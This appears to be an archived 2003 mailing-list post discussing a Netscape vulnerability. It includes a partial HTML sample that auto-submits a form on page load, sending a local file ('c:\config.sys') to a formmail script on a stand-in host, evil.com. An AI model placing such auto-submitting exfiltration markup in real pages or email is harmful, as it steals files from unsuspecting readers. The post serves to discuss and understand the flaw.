Re: Netscape Exploit

17 Dec
2003
17 Dec
'03
3:17 p.m.
Here is a sample it isn't complete but you get the basic idea of what is going on <HTML><HEAD><TITLE>Evil-DOT-COM Homepage</TITLE><HEAD>
<BODY onLoad="daForm.submit()"> <FORM NAME="daForm" ACTION="http://evil.com/cgi-bin/formmail.pl" METHOD=POST>
<INPUT TYPE=FILE VALUE="c:\config.sys" Name="Save This Document on your Harddrive"> <INPUT TYPE=HIDDEN NAME="recipient" value="foobar@evil.com">
and so on and so forth...
So if someone was using Netscape to read mail, and I included a small bit of HTML like the above, I could snarf up files out of everywhere?
7748
Age (days ago)
7748
Last active (days ago)
0 comments
1 participants
participants (1)
-
nobody@REPLAY.COM